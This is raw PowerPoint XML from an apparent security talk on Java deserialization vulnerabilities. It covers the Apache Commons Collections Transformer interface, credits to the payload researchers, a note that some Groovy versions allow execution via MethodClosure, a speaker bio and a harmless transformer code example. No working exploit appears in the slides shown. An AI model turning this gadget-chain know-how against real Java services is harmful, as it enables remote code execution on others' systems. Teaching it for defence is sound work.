                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>Groovy 1.70-2.4.3 allow execution via </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
                        <a:t>MethodClosure</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24859299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t>Example: Apache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Commons</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603136" y="1517301"/>
            <a:ext cx="7626350" cy="4095750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Apache Commons Payload Mechanics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Gabriel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lawrence (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>gebl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) and Christopher </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Frohoff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>frohoff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>First published at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>AppSec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> California 2015</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Apache Commons Spotting Specialists</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stephen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Breen, Foxglove </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>breenmachine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Published in blog “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>What </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>Do WebLogic, WebSphere, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>JBoss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>, Jenkins, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>OpenNMS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>, and Your Application Have in Common? This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="261438924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Example: Apache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Commons</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="690688" y="1581150"/>
            <a:ext cx="7626350" cy="895350"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Apache Commons Collections contains an interface and set of classes known as Transformers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="3048000"/>
            <a:ext cx="7858125" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>public interface </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Transformer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Defines </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>functor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> interface implemented by classes that transform one object into another. A Transformer converts the input object to the output object. The input object should be left unchanged. Transformers are typically used for type conversions, or extracting data from an object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>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6129369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whoami</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Mark Hoopes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>OSCP, CISSP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Senior Application Security Engineer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>ark.hoopes@aspectsecurity.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1" smtClean="0"/>
              <a:t>mapkxync</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Likes: Long </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>walks on the Carolina </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>beach, Capture the Flag, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>denhac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Aspect-Security-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4106" y="1466278"/>
            <a:ext cx="3812694" cy="953174"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="188188167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The Intended </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1000125" y="1518926"/>
            <a:ext cx="7311771" cy="3095624"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent2">
                  <a:lumMod val="20000"/>
                  <a:lumOff val="80000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="dk1">
                  <a:tint val="15000"/>
                  <a:satMod val="350000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
          </a:gradFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk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sz="1400" dirty="0"/>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>java.util</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>.*;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>org.apache.commons.collections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>.*;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>public class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>SimpleTransformer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>   public </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>static void main(String[] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>) {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>        Collection&lt;String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>stringOfNumbers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Arrays.asList</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>("1", "2", "3", "4");</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>        Collection&lt;Integer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>intNums</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>CollectionUtils.collect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>stringOfNumbers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>, new Transformer() {</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>            public </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Object transform(Object o) {</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>                return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Integer.valueOf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>((String) o);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>            }</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>        });</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>CollectionUtils.forAllDo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>intNums</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>PrintIt.getInstance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>() );</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>    }</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1000125" y="1233175"/>
            <a:ext cx="676275" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1000126" y="4671700"/>
            <a:ext cx="952500" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Results</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1000126" y="4964833"/>
            <a:ext cx="7311771" cy="904874"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent2">
                  <a:lumMod val="20000"/>
                  <a:lumOff val="80000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="dk1">
                  <a:tint val="15000"/>
                  <a:satMod val="350000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
          </a:gradFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="50749310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dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Goal</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
